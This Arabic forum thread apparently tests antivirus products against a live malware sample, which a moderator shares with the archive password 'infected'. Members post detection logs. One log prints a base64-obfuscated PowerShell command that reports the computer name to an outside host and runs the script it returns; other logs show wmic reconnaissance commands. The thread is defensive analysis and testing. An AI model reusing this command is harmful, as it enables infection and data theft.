• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

تشفيرة ملف خبيث جداً جداً لتجربته بالتشغيل بتاريخ اليوم 22-11-2024

Ramy Badraan

Ramy BadraanRamy Badraan is verified member.

مراقب قسم الحماية وانظمة لينكس -مصمم بنرات المنتدى
طاقم الإدارة
طـــاقم الإدارة
فريق الدعم لقسم الحماية
نجم الشهر
فريق التصميم
عضوية موثوقة ✔️
كبار الشخصيات
إنضم
26 أكتوبر 2008
المشاركات
2,456
مستوى التفاعل
4,952
النقاط
2,500
الإقامة
مصر
الموقع الالكتروني
www.facebook.com
متصل
JqZJplx.gif


ملف مطلوب تجربته بالتشغيل
الملف اتصالاته الظاهرية سليمة بسيرفرات Adobe
انما السلوكيات اللى مش ظاهرية حاجة تانية ;222)
العينة هتكون سهلة على Eset نظراً لقوته فى فحص ال Memory Pattern
انما على الباقى انتوا وحظكم
غالباً هنشوف مهازل

(ممنوع الرفع على فايرس توتال)

الخبراء بس هما اللى يجربوا
وتجميد النظام ضرورى جدا

Tiq9c81.png


باسوورد فك الضغط

infected
 

توقيع : Ramy BadraanRamy Badraan is verified member.
جاري تجربة تخطى او تصدى المهم انه اختبار . وكل برنامج له قوته . لا صابح و لا مساء و لا سناء . اسم سناء غير منتشر كثيرا ههههه
 
توقيع : tiktoshitiktoshi is verified member.
360_F_602380153_zAQzi70Hcv4XRhhFZm6benfD3K6VZd94.webp


دا قسف يا عم براحة


المهم فتح صفحة pdf


联想截图_20241122015408.webp


联想截图_20241122015316.webp


كود: 
【1】2024-11-22 01:44:49,Anti-virus,Memory Protection,Malware Trojan/ShellLoader.oh detected, disposed

Detection: Trojan/ShellLoader.oh
Detection ID: 625B67F2839542CF
Virtual address: 0x000000006C2D0000
Mapping size: 1.5MB
Is it fully mapped: yes
Data flow hash: 366d5c98
Result: disposed
Process ID: 13056
Process: C:\Windows\SysWOW64\cmd.exe
Process Command line: C:\Windows\SysWOW64\cmd.exe
Parent Process ID: 12504
Parent: C:\Users\tik\AppData\Roaming\Serverdownload\EASteamProxy.exe
Parent process Command line: C:\Users\tik\AppData\Roaming\Serverdownload\EASteamProxy.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【2】2024-11-22 01:44:17,HIPS,Network Access Control,powershell.exe violated the Firewall Rules, Permitted

Protocol: TCP
Remote address: 104.251.111.203:80
Local address: 192.168.8.100:62588
Operation: Connect
Result: Permitted

Process ID: 13032
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【3】2024-11-22 01:44:11,HIPS,Host Reinforcement,javaw.exe violated Sensitive Action Rules, Permitted

Detection: Hidden PowerShell script executions
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Process command line: powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7')); Invoke-Expression $script}"
Result: Permitted
Process ID: 4688
Process: C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
Process Command line: "C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
Process hash: E84749B99EB491E40A62ED2E92E4D7A790D09273
Parent Process ID: 4216
Parent: C:\Users\tik\AppData\Roaming\InstallerPDW\install.exe
Parent process Command line: C:\Users\tik\AppData\Roaming\InstallerPDW\install.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【4】2024-11-22 01:43:48,Anti-virus,Behavior-Based Protection,Malicious behavior ADV:Trojan/GenInjector.S!1.1 detected, disposed

Detection: ADV:Trojan/GenInjector.S!1.1
Path: C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com
Result: disposed

Process ID: 1896
Process Command line: C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
Parent Process ID: 4688
Parent: C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
Parent process Command line: "C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【5】2024-11-22 01:43:46,Anti-virus,Behavior-Based Protection,Malicious behavior ADV:Trojan/GenInjector.S!1.1 detected, disposed

Detection: ADV:Trojan/GenInjector.S!1.1
Path: C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com
Result: disposed

Process ID: 12440
Process Command line: C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
Parent Process ID: 4688
Parent: C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
Parent process Command line: "C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【6】2024-11-22 01:43:44,Anti-virus,Behavior-Based Protection,Malicious behavior ADV:Trojan/GenInjector.S!1.1 detected, disposed

Detection: ADV:Trojan/GenInjector.S!1.1
Path: C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com
Result: disposed

Process ID: 10860
Process Command line: C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
Parent Process ID: 4688
Parent: C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
Parent process Command line: "C:\Users\tik\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


44.webp


لا توجد اصابة بعد فحص بالاداة خاصة بهووروونغ


متاكد من هواوي حكاية ملف كون هوست تنتهي من اولها بعد تحديث هيبس و بيسبس
 
توقيع : tiktoshitiktoshi is verified member.
هواوي


Screenshot 2024-11-22 at 02-54-56 ai مختبر صيني - Recherche Google.webp


ملف explorer.exe . قبله لا اثر له اصلا مشتغلش ههههه

قال له ياعم حج دا لعب عيال
كل شئ بصمت ...... فتح pdf و اتصال رصده هوررونغ عشان عامله جدار حماية فقط عند تجربة بهواوي
 
توقيع : tiktoshitiktoshi is verified member.
بمجدر النظر على اداة detect it easy و capa ارجح انه Luma Stealer
الهاكر شغال Campaigns الله ينور
حاليا انا أقوم بعمل Reverse Engineering على sample منه لكن كل خمس دقائق فيه Sample جديدة !
شكرا أخي على العينة وسأوافيكم بالتفاصيل ان شاء الله
 
توقيع : MagicianMiDo32
MagicianMiDo32 قال:
بمجدر النظر على اداة detect it easy و capa ارجح انه Luma Stealer
الهاكر شغال Campaigns الله ينور
حاليا انا أقوم بعمل Reverse Engineering على sample منه لكن كل خمس دقائق فيه Sample جديدة !
شكرا أخي على العينة وسأوافيكم بالتفاصيل ان شاء الله
أنقر للتوسيع...
نورت يا ميدو 🌹🌹🌹
 
توقيع : tiktoshitiktoshi is verified member.
جاكيشان
[File Guard]2024-11-22 04:49:18 C:\Users\tik\AppData\Local\Temp\800d337351bd86ae1cccb68c293266d6\libcrypto-1_1-x64.dll Deleted Trojan.Penguish.cw
[File Guard]2024-11-22 04:49:17 C:\Users\tik\AppData\Local\Temp\288e7d31c836276547ae62b65725a2fc Deleted Trojan.Penguish.cw
 
توقيع : tiktoshitiktoshi is verified member.
الترند ميكرو
1732256312537.webp



1732256325881.webp



1732256354326.webp
 
توقيع : احمد المخاتره
النود
بالفعل كما تفضلت اخي رامي الملف مكشوف بالفحص وبميزة ESET LiveGuard

==
بالفحص

1732256746474.webp



وبالتحليل السحابي


1732256510667.webp

1732256635611.webp
 
توقيع : احمد المخاتره
الآن باستخدام بهيبس النود لمعرفة سلوكيات الملف

1732256941089.webp



1732256982819.webp


1732257119873.webp

1732257053254.webp



يبدو لي ان الملف يحاول ارسال بيانات من الجهاز الى الموقع الظاهر في تنبيه النود
 
توقيع : احمد المخاتره
ميزة في هواوي انه يقوم تلقائيا بستبدال ملف explorer.exe
ب ملف werfault.exe عندى اشتباه حتى لا تنتشر العدوى او اصابة
لا اعرف ماهي برامج الحماية التى تستخدم نفس طريقة
 
توقيع : tiktoshitiktoshi is verified member.
MagicianMiDo32 قال:
بمجدر النظر على اداة detect it easy و capa ارجح انه Luma Stealer
الهاكر شغال Campaigns الله ينور
حاليا انا أقوم بعمل Reverse Engineering على sample منه لكن كل خمس دقائق فيه Sample جديدة !
شكرا أخي على العينة وسأوافيكم بالتفاصيل ان شاء الله
أنقر للتوسيع...
يا راجل حمدالله على السلامة
وحشتنا والله ووحشنا تشفيراتك
 
توقيع : Ramy BadraanRamy Badraan is verified member.
مرحبا
بمجرد تشغيل الملف
2024-11-22_16-38-56.webp
2024-11-22_16-40-15.webp
 
توقيع : khaled_jtv
توقيع : Ramy BadraanRamy Badraan is verified member.
توقيع : tiktoshitiktoshi is verified member.
ماشي
بالفحص نظيف
اما بالتشغيل

Ashampoo_Snap_Friday, November 22, 2024_15h56m4s.webp
Ashampoo_Snap_Friday, November 22, 2024_15h56m40s.webp
Ashampoo_Snap_Friday, November 22, 2024_15h57m43s.webp
Ashampoo_Snap_Friday, November 22, 2024_15h58m22s.webp
 
توقيع : khaled_jtv
khaled_jtv قال:
ماشي
بالفحص نظيف
اما بالتشغيل

مشاهدة المرفق 262757مشاهدة المرفق 262758مشاهدة المرفق 262759مشاهدة المرفق 262760
أنقر للتوسيع...
قولتله كدة
قولتله يابني بت ديفندر دة وحش بمعني الكلمة والعينات الضعيفة دي مش هتاكل ولا تشرب معاه
وهو علي نغمة واحدة هتتخطي بت ديفندر هتتخطي بت ديفندر
وغلاوة كومودو زي ما بقولك كدة
عيناته ضعيفة
 
توقيع : Ramy BadraanRamy Badraan is verified member.


عاوز اسألك دكتور رامي لو امكن ،، بركز عالأسمبلي x64 او اركز على windows api لتجاوز الحماية ؟ طبعاََ للاختبارات فقط الانسان يخاف الله
على فكرة يسطة ،، انا أصبحت أفتح النظام الوهمي من خلال نظام حقيقي Linux هكذا لما يفتح بورت يكون الوهمي معزول مع طبقات Docker​
 
ابطال الديجتال قال:


عاوز اسألك دكتور رامي لو امكن ،، بركز عالأسمبلي x64 او اركز على windows api لتجاوز الحماية ؟ طبعاََ للاختبارات فقط الانسان يخاف الله
على فكرة يسطة ،، انا أصبحت أفتح النظام الوهمي من خلال نظام حقيقي Linux هكذا لما يفتح بورت يكون الوهمي معزول مع طبقات Docker​
أنقر للتوسيع...
ادرس الاثنين مع بعض
Assembly عشان تعرف إزاي الكود بيشتغل على مستوى المعالج، وWindows API عشان تتعامل مع حماية النظام نفسه.
 
توقيع : Ramy BadraanRamy Badraan is verified member.
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
عودة
أعلى